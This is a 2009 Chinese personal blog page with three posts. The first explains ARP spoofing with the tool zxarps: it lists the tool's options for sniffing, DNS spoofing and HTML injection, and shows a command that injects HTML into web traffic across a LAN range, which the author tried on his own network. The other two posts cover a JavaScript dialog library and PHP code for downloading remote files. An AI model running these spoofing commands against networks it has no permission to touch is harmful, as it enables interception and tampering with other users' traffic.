Arp 欺骗
作者:阿圣(Sfan) 发布于:2009-8-22 11:58 Saturday 分类:计算机
在网上看到一篇关于arp 欺骗的文章..下载了相关的工具测试了一下~
工具:zxarps (需安装 WinPcap)搜索引擎上面能找到这些工具.
zxarps 相关的命令
- options:
- -idx [index] 网卡索引号
- -ip [ip] 欺骗的IP,用'-'指定范围,','隔开
- -sethost [ip] 默认是网关,可以指定别的IP
- -port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口
- -reset 恢复目标机的ARP表
- -hostname 探测主机时获取主机名信息
- -logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,
- ','隔开关键字,多个条件'|'隔开
- 所有带+前缀的关键字都出现的包则写入文件
- 带-前缀的关键字出现的包不写入文件
- 带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)
- -save_a [filename] 将捕捉到的数据写入文件 ACSII模式
- -save_h [filename] HEX模式
- -hacksite [ip] 指定要插入代码的站点域名或IP,
- 多个可用','隔开,没指定则影响所有站点
- -insert [html code]指定要插入html代码
- -postfix [string] 关注的后缀名,只关注HTTP/1.1 302
- -hackURL [url] 发现关注的后缀名后修改URL到新的URL
- -filename [name] 新URL上有效的资源文件名
- -hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开
- 格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1
- -Interval [ms] 定时欺骗的时间间隔,默认是3秒
- -spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者
- -speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB
写了一条命令:zxarps.exe -idx 0 -ip 192.168.1.100-192.168.1.200 -port 80 -insert "just for fun By:Sfan<noframes>"
运行后...到同局域网的另一台电脑 IP:192.168.1.102 上面测试效果 :(机器上面没有装第三方防火墙.有装瑞星杀软)打开IE输入百度后.浏览器正确的显示了插入的代码内容.同时本机提示 "成功插入代码" ~
本机命令运行状态:
zxarps 还有嗅探等相关的功能.能想象得到.当年arp 病毒.有多么可怕.局域网用户还是装上arp 防火墙.更安全 360安全卫士也有带arp 防火墙工具.默认是关闭的需要用户自己开启.
lhgdialog 弹出窗口组件
作者:阿圣(Sfan) 发布于:2009-8-13 23:14 Thursday 分类:Web
lhgcore 小型Js 框架lhgdialog 弹出窗口组件.功能强大,可自定义以实现各种不同的弹出效果,包括:不带灰色半透明遮罩层的普通窗口;带遮罩层的弹出窗口;可定位在在指定位置的弹出窗口;可控制父级页面的弹出窗口等各种效果,一应俱全。
Demo:lhgdialog - samples
标签: js
PHP 中 使用curl 或 fsockopen 下载远程文件
作者:阿圣(Sfan) 发布于:2009-8-5 14:18 Wednesday 分类:Web
curl方法:
- set_time_limit(0);
- ini_set(’display_errors’,true);//Just in case we get some errors, let us know….
- $host = “www.example.net”;
- $urls=array(
- “http://$host/xxx/xxx.jpg”,
- “http://$host/xxx/yyy.jpg”
- );
- $save_to=’./’;
- $mh = curl_multi_init();
- foreach ($urls as $i => $url)
- {
- $g=$save_to.basename($url);
- if(!is_file($g))
- {
- $conn[$i]=curl_init($url);
- $fp[$i]=fopen ($g, “wb”);
- curl_setopt($conn[$i], CURLOPT_USERAGENT, “Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1″);
- curl_setopt($conn[$i], CURLOPT_REFERER, “http://$host”);
- curl_setopt($conn[$i], CURLOPT_FILE, $fp[$i]);
- curl_setopt($conn[$i], CURLOPT_HEADER ,0);
- curl_setopt($conn[$i], CURLOPT_CONNECTTIMEOUT,600);
- curl_setopt($conn[$i], CURLOPT_FOLLOWLOCATION, 1);
- //curl_setopt($conn[$i], CURLOPT_RETURNTRANSFER, 0);
- //curl_setopt($conn[$i], CURLOPT_VERBOSE, 0);
- curl_multi_add_handle ($mh,$conn[$i]);
- }
- }
- do {
- $n=curl_multi_exec($mh,$active);
- }while ($active);
- foreach ($urls as $i => $url)
- {
- curl_multi_remove_handle($mh,$conn[$i]);
- curl_close($conn[$i]);
- fclose ($fp[$i]);
- }
- curl_multi_close($mh);
fsockopen方法
- $url = “http://www.example.net/xxx/xxx.jpg”;
- $t = parse_url($url);
- $host = $t['host'];
- $file = $t['path'];
- $fp = fsockopen($host,80, $errno, $errstr, 30);
- if($fp)
- {
- $header = “GET $file HTTP/1.1\r\n”;
- $header .= “Host: $host\r\n”;
- $header .= “User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\r\n”;
- $header .= “Referer: http://$host\r\n”;
- $header .= “Connection: Close\r\n\r\n”;
- fwrite($fp, $header);
- $jpg = fopen($path . basename($file), “wb”);
- while (!feof($fp))
- {
- $s = fgets($fp,128);
- fwrite($jpg,$s);
- }
- fclose($jpg);
- fclose($fp);
- }
标签: PHP